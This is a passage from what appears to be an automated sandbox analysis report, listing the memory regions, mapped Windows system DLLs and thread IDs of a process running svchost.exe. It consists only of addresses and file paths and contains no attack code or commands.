= "" Region: id = 6250 start_va = 0xb02dc10000 end_va = 0xb02dc8ffff entry_point = 0x0 region_type = private name = "private_0x000000b02dc10000" filename = "" Region: id = 6251 start_va = 0xb02dc90000 end_va = 0xb02dd0ffff entry_point = 0x0 region_type = private name = "private_0x000000b02dc90000" filename = "" Region: id = 6252 start_va = 0xb02dd10000 end_va = 0xb02dd2ffff entry_point = 0x0 region_type = private name = "private_0x000000b02dd10000" filename = "" Region: id = 6253 start_va = 0xb02dd30000 end_va = 0xb02dd4ffff entry_point = 0x0 region_type = private name = "private_0x000000b02dd30000" filename = "" Region: id = 6254 start_va = 0xb02dd50000 end_va = 0xb02dd6ffff entry_point = 0x0 region_type = private name = "private_0x000000b02dd50000" filename = "" Region: id = 6255 start_va = 0xb02dd70000 end_va = 0xb02dd70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02dd70000" filename = "" Region: id = 6256 start_va = 0xb02dd80000 end_va = 0xb02ddfffff entry_point = 0x0 region_type = private name = "private_0x000000b02dd80000" filename = "" Region: id = 6257 start_va = 0xb02de00000 end_va = 0xb02de7ffff entry_point = 0x0 region_type = private name = "private_0x000000b02de00000" filename = "" Region: id = 6258 start_va = 0xb02de80000 end_va = 0xb02de80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02de80000" filename = "" Region: id = 6259 start_va = 0xb02de90000 end_va = 0xb02de90fff entry_point = 0x0 region_type = private name = "private_0x000000b02de90000" filename = "" Region: id = 6260 start_va = 0xb02dea0000 end_va = 0xb02dea0fff entry_point = 0x0 region_type = private name = "private_0x000000b02dea0000" filename = "" Region: id = 6261 start_va = 0xb02deb0000 end_va = 0xb02deb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02deb0000" filename = "" Region: id = 6262 start_va = 0xb02dec0000 end_va = 0xb02dedffff entry_point = 0x0 region_type = private name = "private_0x000000b02dec0000" filename = "" Region: id = 6263 start_va = 0xb02dee0000 end_va = 0xb02dfdffff entry_point = 0x0 region_type = private name = "private_0x000000b02dee0000" filename = "" Region: id = 6264 start_va = 0xb02dfe0000 end_va = 0xb02e05ffff entry_point = 0x0 region_type = private name = "private_0x000000b02dfe0000" filename = "" Region: id = 6265 start_va = 0xb02e060000 end_va = 0xb02e0dffff entry_point = 0x0 region_type = private name = "private_0x000000b02e060000" filename = "" Region: id = 6266 start_va = 0xb02e0e0000 end_va = 0xb02e15ffff entry_point = 0x0 region_type = private name = "private_0x000000b02e0e0000" filename = "" Region: id = 6267 start_va = 0xb02e160000 end_va = 0xb02e35ffff entry_point = 0x0 region_type = private name = "private_0x000000b02e160000" filename = "" Region: id = 6268 start_va = 0xb02e360000 end_va = 0xb02e3dffff entry_point = 0x0 region_type = private name = "private_0x000000b02e360000" filename = "" Region: id = 6269 start_va = 0xb02e3e0000 end_va = 0xb02e45ffff entry_point = 0x0 region_type = private name = "private_0x000000b02e3e0000" filename = "" Region: id = 6270 start_va = 0xb02e460000 end_va = 0xb02e4eefff entry_point = 0xb02e460000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 6271 start_va = 0xb02e4f0000 end_va = 0xb02e56ffff entry_point = 0x0 region_type = private name = "private_0x000000b02e4f0000" filename = "" Region: id = 6272 start_va = 0xb02e570000 end_va = 0xb02e5effff entry_point = 0x0 region_type = private name = "private_0x000000b02e570000" filename = "" Region: id = 6273 start_va = 0xb02e5f0000 end_va = 0xb02e66ffff entry_point = 0x0 region_type = private name = "private_0x000000b02e5f0000" filename = "" Region: id = 6274 start_va = 0xb02e670000 end_va = 0xb02e670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02e670000" filename = "" Region: id = 6275 start_va = 0xb02e680000 end_va = 0xb02e681fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02e680000" filename = "" Region: id = 6276 start_va = 0xb02e6f0000 end_va = 0xb02eaeffff entry_point = 0x0 region_type = private name = "private_0x000000b02e6f0000" filename = "" Region: id = 6277 start_va = 0xb02eaf0000 end_va = 0xb02ebeffff entry_point = 0x0 region_type = private name = "private_0x000000b02eaf0000" filename = "" Region: id = 6278 start_va = 0xb02ebf0000 end_va = 0xb02ebf3fff entry_point = 0xb02ebf0000 region_type = mapped_file name = "pcaevts.dll" filename = "\\Windows\\System32\\pcaevts.dll" (normalized: "c:\\windows\\system32\\pcaevts.dll") Region: id = 6279 start_va = 0xb02ec00000 end_va = 0xb02ec64fff entry_point = 0xb02ec00000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 6280 start_va = 0xb02ec70000 end_va = 0xb02eceffff entry_point = 0x0 region_type = private name = "private_0x000000b02ec70000" filename = "" Region: id = 6281 start_va = 0xb02ecf0000 end_va = 0xb02ed6ffff entry_point = 0x0 region_type = private name = "private_0x000000b02ecf0000" filename = "" Region: id = 6282 start_va = 0xb02ed70000 end_va = 0xb02f56ffff entry_point = 0x0 region_type = private name = "private_0x000000b02ed70000" filename = "" Region: id = 6283 start_va = 0xb02f570000 end_va = 0xb02f5effff entry_point = 0x0 region_type = private name = "private_0x000000b02f570000" filename = "" Region: id = 6284 start_va = 0xb02f5f0000 end_va = 0xb02f5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02f5f0000" filename = "" Region: id = 6285 start_va = 0xb02f600000 end_va = 0xb02f67ffff entry_point = 0x0 region_type = private name = "private_0x000000b02f600000" filename = "" Region: id = 6286 start_va = 0xb02f700000 end_va = 0xb02f77ffff entry_point = 0x0 region_type = private name = "private_0x000000b02f700000" filename = "" Region: id = 6287 start_va = 0xb02f780000 end_va = 0xb02f7fffff entry_point = 0x0 region_type = private name = "private_0x000000b02f780000" filename = "" Region: id = 6288 start_va = 0xb02f800000 end_va = 0xb02f8fffff entry_point = 0x0 region_type = private name = "private_0x000000b02f800000" filename = "" Region: id = 6289 start_va = 0x7ff6db00c000 end_va = 0x7ff6db00dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6db00c000" filename = "" Region: id = 6290 start_va = 0x7ff6db00e000 end_va = 0x7ff6db00ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6db00e000" filename = "" Region: id = 6291 start_va = 0x7ff6db012000 end_va = 0x7ff6db013fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db012000" filename = "" Region: id = 6292 start_va = 0x7ff6db014000 end_va = 0x7ff6db015fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db014000" filename = "" Region: id = 6293 start_va = 0x7ff6db016000 end_va = 0x7ff6db017fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db016000" filename = "" Region: id = 6294 start_va = 0x7ff6db018000 end_va = 0x7ff6db019fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db018000" filename = "" Region: id = 6295 start_va = 0x7ff6db01a000 end_va = 0x7ff6db01bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6db01a000" filename = "" Region: id = 6296 start_va = 0x7ff6db01c000 end_va = 0x7ff6db01dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6db01c000" filename = "" Region: id = 6297 start_va = 0x7ff6db01e000 end_va = 0x7ff6db01ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6db01e000" filename = "" Region: id = 6298 start_va = 0x7ff6db020000 end_va = 0x7ff6db021fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db020000" filename = "" Region: id = 6299 start_va = 0x7ff6db022000 end_va = 0x7ff6db023fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db022000" filename = "" Region: id = 6300 start_va = 0x7ff6db024000 end_va = 0x7ff6db025fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db024000" filename = "" Region: id = 6301 start_va = 0x7ff6db026000 end_va = 0x7ff6db027fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db026000" filename = "" Region: id = 6302 start_va = 0x7ff6db028000 end_va = 0x7ff6db029fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db028000" filename = "" Region: id = 6303 start_va = 0x7ff6db02a000 end_va = 0x7ff6db02bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6db02a000" filename = "" Region: id = 6304 start_va = 0x7ff6db02c000 end_va = 0x7ff6db02dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6db02c000" filename = "" Region: id = 6305 start_va = 0x7ff6db02e000 end_va = 0x7ff6db02ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6db02e000" filename = "" Region: id = 6306 start_va = 0x7ff6db030000 end_va = 0x7ff6db12ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6db030000" filename = "" Region: id = 6307 start_va = 0x7ff6db130000 end_va = 0x7ff6db152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6db130000" filename = "" Region: id = 6308 start_va = 0x7ff6db153000 end_va = 0x7ff6db154fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db153000" filename = "" Region: id = 6309 start_va = 0x7ff6db155000 end_va = 0x7ff6db156fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db155000" filename = "" Region: id = 6310 start_va = 0x7ff6db157000 end_va = 0x7ff6db158fff entry_point = 0x0 region_type = private name = "private_0x00007ff6db157000" filename = "" Region: id = 6311 start_va = 0x7ff6db159000 end_va = 0x7ff6db15afff entry_point = 0x0 region_type = private name = "private_0x00007ff6db159000" filename = "" Region: id = 6312 start_va = 0x7ff6db15b000 end_va = 0x7ff6db15bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6db15b000" filename = "" Region: id = 6313 start_va = 0x7ff6db15c000 end_va = 0x7ff6db15dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6db15c000" filename = "" Region: id = 6314 start_va = 0x7ff6db15e000 end_va = 0x7ff6db15ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6db15e000" filename = "" Region: id = 6315 start_va = 0x7ff6dbe30000 end_va = 0x7ff6dbe3bfff entry_point = 0x7ff6dbe30000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 6316 start_va = 0x7ffb0ac80000 end_va = 0x7ffb0ae07fff entry_point = 0x7ffb0ac80000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 6317 start_va = 0x7ffb0ae10000 end_va = 0x7ffb0ae33fff entry_point = 0x7ffb0ae10000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 6318 start_va = 0x7ffb0be60000 end_va = 0x7ffb0be85fff entry_point = 0x7ffb0be60000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 6319 start_va = 0x7ffb0be90000 end_va = 0x7ffb0bf5dfff entry_point = 0x7ffb0be90000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 6320 start_va = 0x7ffb0d1f0000 end_va = 0x7ffb0d221fff entry_point = 0x7ffb0d1f0000 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 6321 start_va = 0x7ffb0df10000 end_va = 0x7ffb0df23fff entry_point = 0x7ffb0df10000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 6322 start_va = 0x7ffb0df30000 end_va = 0x7ffb0e013fff entry_point = 0x7ffb0df30000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 6323 start_va = 0x7ffb0e1c0000 end_va = 0x7ffb0e1cefff entry_point = 0x7ffb0e1c0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 6324 start_va = 0x7ffb11730000 end_va = 0x7ffb117aefff entry_point = 0x7ffb11730000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 6325 start_va = 0x7ffb117b0000 end_va = 0x7ffb117b9fff entry_point = 0x7ffb117b0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 6326 start_va = 0x7ffb12970000 end_va = 0x7ffb12a34fff entry_point = 0x7ffb12970000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 6327 start_va = 0x7ffb13640000 end_va = 0x7ffb136b5fff entry_point = 0x7ffb13640000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 6328 start_va = 0x7ffb16000000 end_va = 0x7ffb16018fff entry_point = 0x7ffb16000000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 6329 start_va = 0x7ffb16020000 end_va = 0x7ffb16033fff entry_point = 0x7ffb16020000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 6330 start_va = 0x7ffb16110000 end_va = 0x7ffb16156fff entry_point = 0x7ffb16110000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 6331 start_va = 0x7ffb16160000 end_va = 0x7ffb1616dfff entry_point = 0x7ffb16160000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 6332 start_va = 0x7ffb16170000 end_va = 0x7ffb1618dfff entry_point = 0x7ffb16170000 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 6333 start_va = 0x7ffb16190000 end_va = 0x7ffb161eafff entry_point = 0x7ffb16190000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 6334 start_va = 0x7ffb161f0000 end_va = 0x7ffb161f8fff entry_point = 0x7ffb161f0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 6335 start_va = 0x7ffb16270000 end_va = 0x7ffb162cdfff entry_point = 0x7ffb16270000 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 6336 start_va = 0x7ffb162e0000 end_va = 0x7ffb162e9fff entry_point = 0x7ffb162e0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 6337 start_va = 0x7ffb16750000 end_va = 0x7ffb16759fff entry_point = 0x7ffb16750000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 6338 start_va = 0x7ffb16760000 end_va = 0x7ffb16788fff entry_point = 0x7ffb16760000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 6339 start_va = 0x7ffb16bf0000 end_va = 0x7ffb16bf7fff entry_point = 0x7ffb16bf0000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 6340 start_va = 0x7ffb16c00000 end_va = 0x7ffb16cd2fff entry_point = 0x7ffb16c00000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 6341 start_va = 0x7ffb170e0000 end_va = 0x7ffb170f5fff entry_point = 0x7ffb170e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6342 start_va = 0x7ffb171d0000 end_va = 0x7ffb171e8fff entry_point = 0x7ffb171d0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 6343 start_va = 0x7ffb17380000 end_va = 0x7ffb173affff entry_point = 0x7ffb17380000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 6344 start_va = 0x7ffb179a0000 end_va = 0x7ffb17b3afff entry_point = 0x7ffb179a0000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 6345 start_va = 0x7ffb17b40000 end_va = 0x7ffb17b50fff entry_point = 0x7ffb17b40000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6346 start_va = 0x7ffb17b60000 end_va = 0x7ffb17b6afff entry_point = 0x7ffb17b60000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 6347 start_va = 0x7ffb17d30000 end_va = 0x7ffb17e94fff entry_point = 0x7ffb17d30000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6348 start_va = 0x7ffb18dc0000 end_va = 0x7ffb18e21fff entry_point = 0x7ffb18dc0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 6349 start_va = 0x7ffb198d0000 end_va = 0x7ffb198f5fff entry_point = 0x7ffb198d0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 6350 start_va = 0x7ffb19920000 end_va = 0x7ffb19929fff entry_point = 0x7ffb19920000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6351 start_va = 0x7ffb19a90000 end_va = 0x7ffb19b45fff entry_point = 0x7ffb19a90000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 6352 start_va = 0x7ffb19c50000 end_va = 0x7ffb19c72fff entry_point = 0x7ffb19c50000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 6353 start_va = 0x7ffb19c80000 end_va = 0x7ffb19c8cfff entry_point = 0x7ffb19c80000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 6354 start_va = 0x7ffb19d00000 end_va = 0x7ffb19d0bfff entry_point = 0x7ffb19d00000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6355 start_va = 0x7ffb19f50000 end_va = 0x7ffb19f84fff entry_point = 0x7ffb19f50000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6356 start_va = 0x7ffb1a060000 end_va = 0x7ffb1a07efff entry_point = 0x7ffb1a060000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 6357 start_va = 0x7ffb1a0c0000 end_va = 0x7ffb1a162fff entry_point = 0x7ffb1a0c0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 6358 start_va = 0x7ffb1a2b0000 end_va = 0x7ffb1a307fff entry_point = 0x7ffb1a2b0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 6359 start_va = 0x7ffb1a310000 end_va = 0x7ffb1a32dfff entry_point = 0x7ffb1a310000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6360 start_va = 0x7ffb1a330000 end_va = 0x7ffb1a41afff entry_point = 0x7ffb1a330000 region_type = mapped_file name = "kerberos.dll" filename = "\\Windows\\System32\\kerberos.dll" (normalized: "c:\\windows\\system32\\kerberos.dll") Region: id = 6361 start_va = 0x7ffb1a420000 end_va = 0x7ffb1a437fff entry_point = 0x7ffb1a420000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 6362 start_va = 0x7ffb1a540000 end_va = 0x7ffb1a565fff entry_point = 0x7ffb1a540000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6363 start_va = 0x7ffb1a830000 end_va = 0x7ffb1a85afff entry_point = 0x7ffb1a830000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6364 start_va = 0x7ffb1a860000 end_va = 0x7ffb1a8bffff entry_point = 0x7ffb1a860000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6365 start_va = 0x7ffb1a960000 end_va = 0x7ffb1a9b6fff entry_point = 0x7ffb1a960000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6366 start_va = 0x7ffb1a9c0000 end_va = 0x7ffb1a9c9fff entry_point = 0x7ffb1a9c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6367 start_va = 0x7ffb1a9f0000 end_va = 0x7ffb1aa34fff entry_point = 0x7ffb1a9f0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6368 start_va = 0x7ffb1aa50000 end_va = 0x7ffb1aa63fff entry_point = 0x7ffb1aa50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6369 start_va = 0x7ffb1ab00000 end_va = 0x7ffb1ab11fff entry_point = 0x7ffb1ab00000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 6370 start_va = 0x7ffb1ab20000 end_va = 0x7ffb1acf6fff entry_point = 0x7ffb1ab20000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 6371 start_va = 0x7ffb1ad00000 end_va = 0x7ffb1ad4bfff entry_point = 0x7ffb1ad00000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 6372 start_va = 0x7ffb1ad50000 end_va = 0x7ffb1ad99fff entry_point = 0x7ffb1ad50000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6373 start_va = 0x7ffb1ada0000 end_va = 0x7ffb1aeaffff entry_point = 0x7ffb1ada0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6374 start_va = 0x7ffb1af60000 end_va = 0x7ffb1b006fff entry_point = 0x7ffb1af60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6375 start_va = 0x7ffb1b010000 end_va = 0x7ffb1b067fff entry_point = 0x7ffb1b010000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6376 start_va = 0x7ffb1b070000 end_va = 0x7ffb1b126fff entry_point = 0x7ffb1b070000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6377 start_va = 0x7ffb1b140000 end_va = 0x7ffb1b279fff entry_point = 0x7ffb1b140000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6378 start_va = 0x7ffb1b280000 end_va = 0x7ffb1b288fff entry_point = 0x7ffb1b280000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6379 start_va = 0x7ffb1b290000 end_va = 0x7ffb1b407fff entry_point = 0x7ffb1b290000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6380 start_va = 0x7ffb1b410000 end_va = 0x7ffb1b580fff entry_point = 0x7ffb1b410000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6381 start_va = 0x7ffb1b870000 end_va = 0x7ffb1ba45fff entry_point = 0x7ffb1b870000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6382 start_va = 0x7ffb1ba50000 end_va = 0x7ffb1baa6fff entry_point = 0x7ffb1ba50000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6383 start_va = 0x7ffb1cef0000 end_va = 0x7ffb1cf94fff entry_point = 0x7ffb1cef0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6384 start_va = 0x7ffb1cfa0000 end_va = 0x7ffb1d043fff entry_point = 0x7ffb1cfa0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6385 start_va = 0x7ffb1d230000 end_va = 0x7ffb1d280fff entry_point = 0x7ffb1d230000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6386 start_va = 0x7ffb1d450000 end_va = 0x7ffb1d594fff entry_point = 0x7ffb1d450000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6387 start_va = 0x7ffb1d5a0000 end_va = 0x7ffb1d6d5fff entry_point = 0x7ffb1d5a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6388 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 335 os_tid = 0xa78 Thread: id = 336 os_tid = 0xa68 Thread: id = 337 os_tid = 0x890 Thread: id = 338 os_tid = 0x790 Thread: id = 339 os_tid = 0xb28 Thread: id = 340 os_tid = 0xb10 Thread: id = 341 os_tid = 0x9d8 Thread: id = 342 os_tid = 0x9d4 Thread: id = 343 os_tid = 0x7c4 Thread: id = 344 os_tid = 0x164 Thread: id = 345 os_tid = 0x160 Thread: id = 346 os_tid = 0x11c Thread: id = 347 os_tid = 0x3e4 Thread: id = 348 os_tid = 0x3e0 Thread: id = 349 os_tid = 0x38c Thread: id = 350 os_tid = 0x34c Thread: id = 351 os_tid 